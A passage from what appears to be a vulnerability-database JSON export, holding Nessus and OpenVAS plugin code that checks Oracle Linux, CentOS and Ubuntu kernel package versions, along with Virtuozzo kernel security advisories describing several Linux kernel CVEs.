value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.16.1.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.16.1.0.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:41:50", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "CENTOS_RHSA-2017-0933.NASL", "href": "https://www.tenable.com/plugins/nessus/99383", "published": "2017-04-14T00:00:00", "title": "CentOS 7 : kernel (CESA-2017:0933)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0933 and \n# CentOS Errata and Security Advisory 2017:0933 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99383);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/10/02 15:30:21\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n script_xref(name:\"RHSA\", value:\"2017:0933\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2017:0933)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-April/022385.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2af98135\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.16.1.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.16.1.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:59", "bulletinFamily": "unix", "description": "This update provides a new kernel 2.6.32-042stab131.1 for Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 that is a rebase to the Red Hat Enterprise Linux 6.10 kernel 2.6.32-754.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2018-10675\nThe do_get_mempolicy() function in 'mm/mempolicy.c' in the Linux kernel allows local users to hit a use-after-free bug via crafted system calls and thus cause a denial of service (DoS) or possibly have unspecified other impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.\n\n**Vulnerability id:** CVE-2012-6701\nIt was found that AIO interface didn't use the proper rw_verify_area() helper function with extended functionality, for example, mandatory locking on the file. Also rw_verify_area() makes extended checks, for example, that the size of the access doesn't cause overflow of the provided offset limits. This integer overflow in fs/aio.c in the Linux kernel before 3.4.1 allows local users to cause a denial of service or possibly have unspecified other impact via a large AIO iovec.\n\n**Vulnerability id:** CVE-2015-8830\nInteger overflow in the aio_setup_single_vector function in fs/aio.c in the Linux kernel 4.0 allows local users to cause a denial of service or possibly have unspecified other impact via a large AIO iovec. NOTE: this vulnerability exists because of a CVE-2012-6701 regression.\n\n**Vulnerability id:** CVE-2016-8650\nA flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key.\n\n**Vulnerability id:** CVE-2017-2671\nA race condition leading to a NULL pointer dereference was found in the Linux kernel's Link Layer Control implementation. A local attacker with access to ping sockets could use this flaw to crash the system.\n\n**Vulnerability id:** CVE-2017-6001\nIt was found that the original fix for CVE-2016-6786 was incomplete. There exist a race between two concurrent sys_perf_event_open() calls when both try and move the same pre-existing software group into a hardware context.\n\n**Vulnerability id:** CVE-2017-7616\nIncorrect error handling in the set_mempolicy() and mbind() compat syscalls in 'mm/mempolicy.c' in the Linux kernel allows local users to obtain sensitive information from uninitialized stack data by triggering failure of a certain bitmap operation.\n\n**Vulnerability id:** CVE-2017-7889\nThe mm subsystem in the Linux kernel through 4.10.10 does not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism, which allows local users to read or write to kernel memory locations in the first megabyte (and bypass slab-allocation access restrictions) via an application that opens the /dev/mem file, related to arch/x86/mm/init.c and drivers/char/mem.c.\n\n**Vulnerability id:** CVE-2017-12190\nIt was found that in the Linux kernel through v4.14-rc5, bio_map_user_iov() and bio_unmap_user() in 'block/bio.c' do unbalanced pages refcounting if IO vector has small consecutive buffers belonging to the same page. bio_add_pc_page() merges them into one, but the page reference is never dropped, causing a memory leak and possible system lockup due to out-of-memory condition.\n\n**Vulnerability id:** CVE-2017-18203\nThe Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.\n\n**Vulnerability id:** CVE-2018-5803\nAn error in the \"_sctp_make_chunk()\" function (net/sctp/sm_make_chunk.c) when handling SCTP, packet length can be exploited by a malicious local user to cause a kernel crash and a DoS.\n\n**Vulnerability id:** CVE-2018-7757\nMemory leak in the sas_smp_get_phy_events function in drivers/scsi/libsas/sas_expander.c in the Linux kernel allows local users to cause a denial of service (kernel memory exhaustion) via multiple read accesses to files in the /sys/class/sas_phy directory.\n\n", "modified": "2018-06-25T00:00:00", "published": "2018-06-25T00:00:00", "id": "VZA-2018-040", "href": "https://help.virtuozzo.com/customer/portal/articles/2945473", "title": "Important kernel security update: CVE-2018-10675 and other issues; new kernel 2.6.32-042stab131.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:18", "bulletinFamily": "unix", "description": "This update provides a new kernel 2.6.32-042stab131.1 for Virtuozzo 6.0 that is a rebase to the Red Hat Enterprise Linux 6.10 kernel 2.6.32-754.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2018-10675\nThe do_get_mempolicy() function in 'mm/mempolicy.c' in the Linux kernel allows local users to hit a use-after-free bug via crafted system calls and thus cause a denial of service (DoS) or possibly have unspecified other impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.\n\n**Vulnerability id:** CVE-2012-6701\nIt was found that AIO interface didn't use the proper rw_verify_area() helper function with extended functionality, for example, mandatory locking on the file. Also rw_verify_area() makes extended checks, for example, that the size of the access doesn't cause overflow of the provided offset limits. This integer overflow in fs/aio.c in the Linux kernel before 3.4.1 allows local users to cause a denial of service or possibly have unspecified other impact via a large AIO iovec.\n\n**Vulnerability id:** CVE-2015-8830\nInteger overflow in the aio_setup_single_vector function in fs/aio.c in the Linux kernel 4.0 allows local users to cause a denial of service or possibly have unspecified other impact via a large AIO iovec. NOTE: this vulnerability exists because of a CVE-2012-6701 regression.\n\n**Vulnerability id:** CVE-2016-8650\nA flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key.\n\n**Vulnerability id:** CVE-2017-2671\nA race condition leading to a NULL pointer dereference was found in the Linux kernel's Link Layer Control implementation. A local attacker with access to ping sockets could use this flaw to crash the system.\n\n**Vulnerability id:** CVE-2017-6001\nIt was found that the original fix for CVE-2016-6786 was incomplete. There exist a race between two concurrent sys_perf_event_open() calls when both try and move the same pre-existing software group into a hardware context.\n\n**Vulnerability id:** CVE-2017-7616\nIncorrect error handling in the set_mempolicy() and mbind() compat syscalls in 'mm/mempolicy.c' in the Linux kernel allows local users to obtain sensitive information from uninitialized stack data by triggering failure of a certain bitmap operation.\n\n**Vulnerability id:** CVE-2017-7889\nThe mm subsystem in the Linux kernel through 4.10.10 does not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism, which allows local users to read or write to kernel memory locations in the first megabyte (and bypass slab-allocation access restrictions) via an application that opens the /dev/mem file, related to arch/x86/mm/init.c and drivers/char/mem.c.\n\n**Vulnerability id:** CVE-2017-12190\nIt was found that in the Linux kernel through v4.14-rc5, bio_map_user_iov() and bio_unmap_user() in 'block/bio.c' do unbalanced pages refcounting if IO vector has small consecutive buffers belonging to the same page. bio_add_pc_page() merges them into one, but the page reference is never dropped, causing a memory leak and possible system lockup due to out-of-memory condition.\n\n**Vulnerability id:** CVE-2017-18203\nThe Linux kernel, before version 4.14.3, is vulnerable to a denial of service in drivers/md/dm.c:dm_get_from_kobject() which can be caused by local users leveraging a race condition with __dm_destroy() during creation and removal of DM devices. Only privileged local users (with CAP_SYS_ADMIN capability) can directly perform the ioctl operations for dm device creation and removal and this would typically be outside the direct control of the unprivileged attacker.\n\n**Vulnerability id:** CVE-2018-5803\nAn error in the \"_sctp_make_chunk()\" function (net/sctp/sm_make_chunk.c) when handling SCTP, packet length can be exploited by a malicious local user to cause a kernel crash and a DoS.\n\n**Vulnerability id:** CVE-2018-7757\nMemory leak in the sas_smp_get_phy_events function in drivers/scsi/libsas/sas_expander.c in the Linux kernel allows local users to cause a denial of service (kernel memory exhaustion) via multiple read accesses to files in the /sys/class/sas_phy directory.\n\n", "modified": "2018-06-25T00:00:00", "published": "2018-06-25T00:00:00", "id": "VZA-2018-041", "href": "https://help.virtuozzo.com/customer/portal/articles/2945474", "title": "Important kernel security update: CVE-2018-10675 and other issues; new kernel 2.6.32-042stab131.1; Virtuozzo 6.0 Update 12 Hotfix 28 (6.0.12-3709)", "type": "virtuozzo", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-09-19T00:00:00", "id": "OPENVAS:1361412562310843312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843312", "title": "Ubuntu Update for linux USN-3422-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3422_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3422-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843312\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-19 07:43:00 +0200 (Tue, 19 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\",\n \"CVE-2016-8650\", \"CVE-2016-9083\", \"CVE-2016-9084\", \"CVE-2016-9178\",\n \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2016-9754\", \"CVE-2017-5970\",\n \"CVE-2017-6214\", \"CVE-2017-6346\", \"CVE-2017-6951\", \"CVE-2017-7187\",\n \"CVE-2017-7472\", \"CVE-2017-7541\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3422-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a buffer overflow\n existed in the Bluetooth stack of the Linux kernel when handling L2CAP\n configuration responses. A physically proximate attacker could use this to cause\n a denial of service (system crash). (CVE-2017-1000251) It was discovered that\n the asynchronous I/O (aio) subsystem of the Linux kernel did not properly set\n permissions on aio memory mappings in some situations. An attacker could use\n this to more easily exploit other vulnerabilities. (CVE-2016-10044) Baozeng Ding\n and Andrey Konovalov discovered a race condition in the L2TPv3 IP Encapsulation\n implementation in the Linux kernel. A local attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2016-10200) Andreas Gruenbacher and Jan Kara discovered that the filesystem\n implementation in the Linux kernel did not clear the setgid bit during a\n setxattr call. A local attacker could use this to possibly elevate group\n privileges. (CVE-2016-7097) Sergej Schumilo, Ralf Spenneberg, and Hendrik\n Schwartke discovered that the key management subsystem in the Linux kernel did\n not properly allocate memory in some situations. A local attacker could use this\n to cause a denial of service (system crash). (CVE-2016-8650) Vlad Tsyrklevich\n discovered an integer overflow vulnerability in the VFIO PCI driver for the\n Linux kernel. A local attacker with access to a vfio PCI device file could use\n this to cause a denial of service (system crash) or possibly execute arbitrary\n code. (CVE-2016-9083, CVE-2016-9084) It was discovered that an information leak\n existed in __get_user_asm_ex() in the Linux kernel. A local attacker could use\n this to expose sensitive information. (CVE-2016-9178) CAI Qian discovered that\n the sysctl implementation in the Linux kernel did not properly perform reference\n counting in some situations. An unprivileged attacker could use this to cause a\n denial of service (system hang). (CVE-2016-9191) It was discovered that the\n keyring implementation in the Linux kernel in some situations did not prevent\n special internal keyrings from being joined by userspace keyrings. A privileged\n local attacker could use this to bypass module verification. (CVE-2016-9604) It\n was discovered that an integer overflow existed in the trace subsystem of the\n Linux kernel. A local privileged attacker could use this to cause a denial of\n service (system crash). (CVE-2016-9754) Andrey Konovalov discovered that the\n IPv4 implementation in the Linux kernel did not properly handle invalid IP\n options in some situations. An attacker could use this to cause a denial of\n service or possibly ex ... Description truncated, for more information please\n check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3422-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3422-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-generic\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-generic-lpae\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-lowlatency\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-powerpc-e500\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-powerpc-e500mc\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-132-powerpc-smp\", ver:\"3.13.0-132.181\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n 